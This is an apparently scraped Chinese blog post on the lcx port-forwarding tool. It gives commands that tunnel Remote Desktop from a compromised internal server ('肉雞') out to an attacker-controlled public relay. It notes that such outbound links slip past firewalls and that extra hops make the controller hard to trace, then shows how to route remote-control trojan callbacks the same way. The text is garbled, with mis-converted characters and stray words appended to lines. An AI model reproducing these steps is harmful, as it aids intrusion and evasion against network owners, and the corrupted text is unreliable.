端口轉發工具lcx使用兩類

  lcx是一款強大的內網端口轉發工具,用於將內網主機開放的內部端口映射到外網主機(有公網IP)任意端口。它是一款命令行工具,固然也能夠在有權限的webshell下執行,正因如此lcx常被認爲是一款黑客入侵工具,lcx在內網入侵滲透中起着重要的角色。lcx進行端口轉發的原理就是使不一樣端口之間造成一個迴路(如圖1)。它經常使用於外網鏈接內網3389端口。linux

  這個工具很早就已經有了,它的全名叫Socket data transport tool,簡寫作trtool,由紅盟聯盟的前輩bkbll所寫,功能和lion寫的htran 1.1版同樣,不過是在linux下使用的而已。所謂的lcx.exe實際上是lcx根據lion的代碼所修改編譯過的htran。如今已經有跨平臺的了,支持在windows、linux下使用。還有一些根據lcx源碼開發的其餘版本,好比jsp版,http隧道版等等。web

  

  下面說一下它的使用以及功能說明:shell

Usage of Packet Transmit:
  ./lcx -<listen|tran|slave> <option> [<-log|-hex|-text> file] 
  ./lcx -about

[options:]
  -listen <local port1>  <local port2>
  -tran   <local port>   <remote host>  <remote port>
  -slave  <remote host1> <remote port1> <remote host2> <remote port2>

  -hex   : hex mode data dump
  -text  : text mode data dump
  -log   : save transfer log

  最經常使用功能:鏈接內網的3389windows

  1. B主機(公網IP:20.30.40.50): lcx -listen 2222 6666服務器

  2222爲轉發端口,6666爲B主機任意未被佔用的端口網絡

  2. A肉雞服務器:lcx.exe -slave 20.30.40.50 2222 127.0.0.1 3389jsp

  20.30.40.50爲B主機的IP,2222爲轉發端口,127.0.0.1爲A肉雞內網IP,3389爲遠程終端端口工具

  3. B主機鏈接A肉雞3389時格式:mstsc 127.0.0.1:6666spa

   固然,其餘主機(C主機,能夠在內網中)鏈接A肉雞服務器:mstsc 20.30.40.50:6666命令行

  至此,就能夠經過lcx端口映射就能夠直接鏈接內網服務器了。整個鏈接流程圖大體以下:

  上面的狀況中多數是經過跳板主機B來鏈接肉雞服務器的,也就是主機C經過鏈接處於公網中的服務器B來鏈接內網服務器A。上面的鏈接中,先是肉雞服務器主動發起向外(主機B)的鏈接,因此這種狀況,防火牆通常是不會攔截的。並且因爲跳板機(主機B)只是監聽本地端口,而控制者(主機C)能夠在任意網絡環境中,因此很難追蹤到控制者的具體位置。若是再加上幾個跳板就很難被查水錶啦:)

 

  逆向思惟:端口轉發實現遠程控制

  基於lcx強大的端口轉發功能,能夠經過端口轉發實現將遠程控制的服務端放置的任意網絡環境中。  

  1. 配置客戶端上線地址:21.23.10.8 端口:8083

  2. 公網主機運行lcx:lcx -listen 123 8083

  3. 控制端運行:lcx.exe -slave 21.23.10.8 123 127.0.0.1 789  通知設置遠控控制端的監聽端口:789  

  能夠看到,這用使用方式和上面的徹底相反。控制端使用lcx主動鏈接公網中的轉發主機,因爲肉雞上的客戶端默認是配置主動鏈接的,因此只要轉發通道是通暢的,客戶端發起的鏈接都會由轉發主機轉發到控制端的機子上,而不管控制端是否有公網IP。因此說,關鍵的瓶頸就能夠這用解決。又因爲lcx已經支持跨平臺,因此即便公網主機是Linux系統也能夠實現只能在windows上跑的絕大多數遠控軟件。

    關於lcx的使用就簡單介紹到這裏,以後將會對lcx源碼作一個簡單的分析,博客將持續更新。。。

相關文章
相關標籤/搜索